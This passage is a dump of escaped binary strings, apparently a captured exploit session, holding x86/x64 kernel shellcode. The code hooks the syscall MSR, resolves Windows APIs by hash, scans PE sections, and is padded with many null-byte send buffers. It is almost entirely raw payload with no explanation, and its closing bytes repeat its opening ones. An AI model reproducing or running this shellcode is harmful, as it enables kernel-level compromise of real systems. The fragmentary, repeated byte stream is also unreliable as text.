\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\
\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 8, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\
x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\[email\u00a0protected]\\\\x90t\\\\x08\\\\xe8\\\\t\\\\
x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea \\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea 
H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\[email\u00a0protected]\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\[email\u00a0protected]\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\x
f8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xe
b\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\[email\u00a0protected]\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\[email\u00a0protected]\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\[email\u00a0protected]\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\
\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\[email\u00a0protected]<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\[email\u00a0protected]\\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\[email\u00a0protected]\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x
00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\
